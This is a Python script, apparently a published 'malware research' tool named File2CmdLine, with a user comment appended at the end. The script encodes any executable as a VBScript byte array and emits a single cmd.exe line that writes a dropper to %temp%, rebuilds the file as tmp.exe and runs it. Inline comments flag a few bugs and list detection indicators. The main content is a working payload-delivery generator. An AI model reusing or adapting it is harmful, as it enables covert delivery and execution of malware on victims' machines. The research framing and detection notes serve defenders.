#-----------------------------------------------------------------------------------------------------------------------
# PHROZEN SAS (c) 2018 - www.phrozen.io
# Jean-Pierre LESUEUR ([email protected])
#
# Name : File2CmdLine
# Description : Convert a small file to a single-line command. When executed, the file is extracted and executed.
# Category : Malware Research
# Version : 1 (27/04/2017)
# Target OS : Windows XP->Windows 10 (32/64bit)
# License : MIT
#
# Example of command:
# python File2CmdLine.py -f "c:\tmp\smallapp.exe"-o "c:\tmp\test.bat"
#-----------------------------------------------------------------------------------------------------------------------
import argparse | |
import sys | |
import os | |
# Define arguments
# Both FileType arguments open their files at parse time; the script later
# re-opens each path by `.name` (see below), so the argparse-owned handles
# stay open and unused for the rest of the run.
parser = argparse.ArgumentParser(description='File2Batch')
parser.add_argument('-f', action="store", dest="srcFile", metavar='in-file', type=argparse.FileType('rb'), required=True, help="File to be encoded in command line.")
parser.add_argument('-o', action="store", dest="outFile", metavar='out-file', type=argparse.FileType('wt'), required=True, help="Output file containing the output command line.")
try:
    argv = parser.parse_args()
except IOError:
    # NOTE(review): ArgumentParser.error() requires a message argument; as
    # written, this handler would itself raise TypeError if it were reached.
    parser.error()
#
# TRANSFORM INPUT FILE IN BINARY ARRAY
#
# Builds the text of a VBScript `array(...)` literal holding the input file's
# bytes as decimal values, reading the file one byte at a time.
payload = "payload=array(";
with open(argv.srcFile.name, 'rb') as FFile:
    while True:
        s = FFile.read(1)
        if len(s) == 0: break
        b = ord(s)
        payload += str(b) + ","
# Drop the trailing comma left by the loop, then close the array literal.
payload = payload[:-1]
payload += ")"
# Attribute access, not a call: this line has no effect. The `with` block
# above has already closed the handle.
FFile.close
#
# WRITE VBS EXTRACTION AND EXECUTION CODE TO BE PLACED IN A SHELL
#
# The result is a single cmd.exe command line: it deletes %temp%\tmp.vbs,
# appends each VBScript line to that file with `echo ... >>`, and finally
# invokes the script. The VBScript itself rebuilds the byte array into
# %temp%\tmp.exe via Scripting.FileSystemObject/CreateTextFile and launches
# it through WScript.Shell.Run.
# IR/detection notes, all visible in the strings below: the fixed paths
# %temp%\tmp.vbs and %temp%\tmp.exe, an unusually long cmd.exe command line
# made of chained `echo ... >>` redirections, and a script host started from
# cmd.exe that then spawns an executable from %temp%.
tempFile = " >> %temp%\\tmp.vbs"
maliciousVBS = "del %temp%\\tmp.vbs & "
maliciousVBS += "echo " + payload + tempFile + " & "
maliciousVBS += "echo " + "Set FSO = Wscript.CreateObject(\"Scripting.FileSystemObject\")" + tempFile + " & "
maliciousVBS += "echo " + "Set CTF = FSO.CreateTextFile(\"%temp%\\tmp.exe\")" + tempFile + " & "
maliciousVBS += "echo " + "for i = 0 to UBound(payload)" + tempFile + " & "
maliciousVBS += "echo " + "buff = buff^&chr(payload(i))" + tempFile + " & "
maliciousVBS += "echo " + "next" + tempFile + " & "
maliciousVBS += "echo " + "CTF.Write buff" + tempFile + " & "
maliciousVBS += "echo " + "Dim objShell" + tempFile + " & "
maliciousVBS += "echo " + "Set objShell = WScript.CreateObject(\"WScript.Shell\")" + tempFile + " & "
maliciousVBS += "echo " + "CTF.Close" + tempFile + " & "
maliciousVBS += "echo " + "objShell.Run(\"%temp%\\tmp.exe\")" + tempFile + " & "
maliciousVBS += "%temp%\\tmp.vbs"
# Second handle on the output path: the FileType('wt') handle opened by
# argparse is still open and is not the one written to here.
with open(argv.outFile.name, 'w') as FDest:
    FDest.write(maliciousVBS)
Not sure why, as your other script (File2Lnk) works fine, but this won't work for me. I watched the temp directory and the files are never dropped/decoded, so nothing runs. Using python file2cmdline.py -f testfile.exe -o TestBat.bat; tried with both Python 2.7 and Python 3.7, still won't work.